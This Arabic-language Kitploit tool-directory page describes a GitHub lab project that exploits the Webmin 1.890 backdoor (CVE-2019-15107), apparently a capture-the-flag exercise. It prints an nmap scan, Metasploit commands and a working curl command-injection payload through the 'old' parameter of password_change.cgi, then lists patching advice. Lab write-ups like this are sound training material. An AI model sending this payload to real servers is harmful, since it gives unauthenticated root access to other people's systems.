Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Project-Exploitation-of-Webmin-Authentication-Vulnerability — هدف البحث: إجراء تحليل شامل واستغلال ناجح لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في Webmin الإصدار 1.890 (CVE-2019-15107)، والحصول في النهاية على السيطرة الكاملة على النظام المستهدف. | Kitploit
أدوات/GitHubGitHub/artemcyberlab/project-exploitation-of-webmin-authentication-vulnerability
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubartemcyberlab/project-exploitation-of-webmin-authentication-vulnerability

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Project-Exploitation-of-Webmin-Authentication-Vulnerability

هدف البحث: إجراء تحليل شامل واستغلال ناجح لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في Webmin الإصدار 1.890 (CVE-2019-15107)، والحصول في النهاية على السيطرة الكاملة على النظام المستهدف.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

هدف البحث: إجراء تحليل شامل واستغلال ناجح لثغرة تنفيذ الأوامر عن بعد (RCE) في Webmin الإصدار 1.890 (CVE-2019-15107)، والحصول في النهاية على السيطرة الكاملة على النظام المستهدف.

المنهجية:

الاستطلاع الأولي:

تم إجراء مسح الشبكة باستخدام Nmap:

bash nmap -sV -sC -A -p- 10.201.105.185 تم تحديد خدمة Webmin 1.890 قيد التشغيل على المنفذ 10000

تحليل الثغرة:

تم التحقيق في آلية الثغرة في password_change.cgi

تم تأكيد إمكانية تنفيذ الأوامر التعسفية دون مصادقة

الاستغلال:

تم تنفيذ متجهين هجوميين:

  • باستخدام إطار Metasploit:

bash use exploit/linux/http/webmin_backdoor set RHOSTS 10.201.105.185 set LHOST tun0 exploit

  • الاستغلال اليدوي عبر curl:

bash curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test" ما بعد الاستغلال:

تم الحصول على شل جذر تفاعلي

تم إجراء تحليل لنظام الملفات

تم اكتشاف ملفات العلم:

bash /home/dark/user.txt /root/root.txt النتائج:

تم استغلال ثغرة CVE-2019-15107 بنجاح

تم الحصول على صلاحيات جذر كاملة على النظام

تم إثبات الأهمية الحاسمة للتحديثات البرمجية في الوقت المناسب

الاستنتاجات الفنية:

تسمح الثغرة بتنفيذ الأوامر التعسفية عبر حقن معامل "old"

غياب فحوصات المصادقة يجعل هذا خطيرًا بشكل خاص

الإصدار 1.890 يحتوي على باب خلفي تم تصحيحه في الإصدارات اللاحقة

التوصيات الأمنية:

الترقية الفورية إلى إصدار Webmin الحالي

تقييد الوصول إلى لوحة الإدارة حسب عنوان IP

إجراء تدقيق أمني منتظم لتطبيقات الويب

اتجاهات البحث المستقبلية:

تحليل ثغرات Webmin الأخرى

تطوير استغلال مخصص بدون Metasploit

التحقيق في تقنيات الثبات في الأنظمة المخترقة

توضح هذه الدراسة حالة الأهمية الحاسمة للتحديثات النظامية في الوقت المناسب وضرورة المراقبة المستمرة للثغرات في البرامج المنشورة. يوفر البحث رؤى عملية حول تقنيات استغلال تطبيقات الويب الحديثة مع التأكيد على مبادئ الأمان الأساسية.

تنزيل الأداة